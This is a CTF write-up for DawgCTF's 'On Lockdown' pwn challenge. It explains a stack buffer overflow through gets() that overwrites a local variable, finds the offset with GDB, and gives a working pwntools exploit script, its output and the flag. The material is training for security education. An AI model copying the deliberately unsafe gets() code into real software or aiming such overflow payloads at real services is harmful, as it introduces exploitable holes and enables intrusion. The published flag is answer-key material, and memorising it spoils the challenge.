## On Lockdown

* **CTF:** DawgCTF
* **Category:** pwn
* **Points:** 50
* **Author(s):** b0uldrr
* **Date:** 11/04/20

---

### Challenge
```
Better than locked up I guess

nc ctf.umbccd.io 4500

Author: trashcanna

```

### Downloads
* [onlockdown](onlockdown)
* [onlockdown.c](onlockdown.c)

---

### Solution

We're given a vulnerable binary and its source, but we'll need to execute our attack on the provided remote server to get the flag. Examining the source code, we can see that we need to get to the `flag_me` function but the call to this function is guarded by an `if` statement which checks the value of local variable `lock`, which is never set to the required value of `0xdeadbabe`. Foruntately, we can overflow the `gets` call and overwrite this value of `lock`.

Here is the source code:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void flag_me(){
        system("cat flag.txt");
}

void lockdown(){
        int lock = 0;
        char buf[64];
        printf("I made this really cool flag but Governor Hogan put it on lockdown\n");
        printf("Can you convince him to give it to you?\n");
        gets(buf);
        if(lock == 0xdeadbabe){
                flag_me();
        }else{
                printf("I am no longer asking. Give me the flag!\n");
        }
}

int main(){
        lockdown();
        return 0;
}
```

The only thing I need to know before conducting the attack is the offset from the the array we're going to overflow to the start of the `lock` variable. To determine this, I opened the binary in GDB, set a breakpoint directly after the `gets` call in `lockdown` and then examined the stack. I looked for my input (which I set to `aaaabbbbccccdddd` so that it would be recognisable on the stack) and then counted the bytes until where the `lock` value was held on the stack. My commands in GDB were:

* `disas lockdown` - disassemble lockdown to look for the address after gets() to set the breakpoint at
* `b *0x5655622d` - set the breakpoint
* `r` - run the program
* `aaaabbbbccccdddd` enter this as input when prompted by the program. We should trigger the breakpoint immediately after this input.
* `x/40wx $esp` - now at the breakpoint, examine 40 words after the stack pointer

![breakpoint](images/breakpoint.png)

We can see our input `aaaabbbbccccdddd` on the stack (in its hex value of 0x61, 62, 63 and 64 respectively) and we can also see the value of `lock` (0) at address 0xffffd2a4. Counting manually, we can see we will start to write over the value of lock after 64 bytes from the beginning of our input buffer. Now we have everything we need to conduct the attack. I wrote a python script to automate it.

```python
#! /usr/bin/python3
import pwn

local = False

if local:
    conn = pwn.process("./onlockdown")
else:
    conn = pwn.remote("ctf.umbccd.io", 4500)

payload  = b'a' * 64
payload += pwn.p32(0xdeadbabe)

print(conn.recvuntil("you?").decode())
conn.sendline(payload)
print(conn.recvall().decode())
```

And the output...

```
$ ./soln.py 
[+] Opening connection to ctf.umbccd.io on port 4500: Done
I made this really cool flag but Governor Hogan put it on lockdown
Can you convince him to give it to you?
[+] Receiving all data: Done (30B)
[*] Closed connection to ctf.umbccd.io port 4500

DawgCTF{s3ri0u$ly_st@y_h0m3}
```

### Flag 
```
DawgCTF{s3ri0u$ly_st@y_h0m3}
```
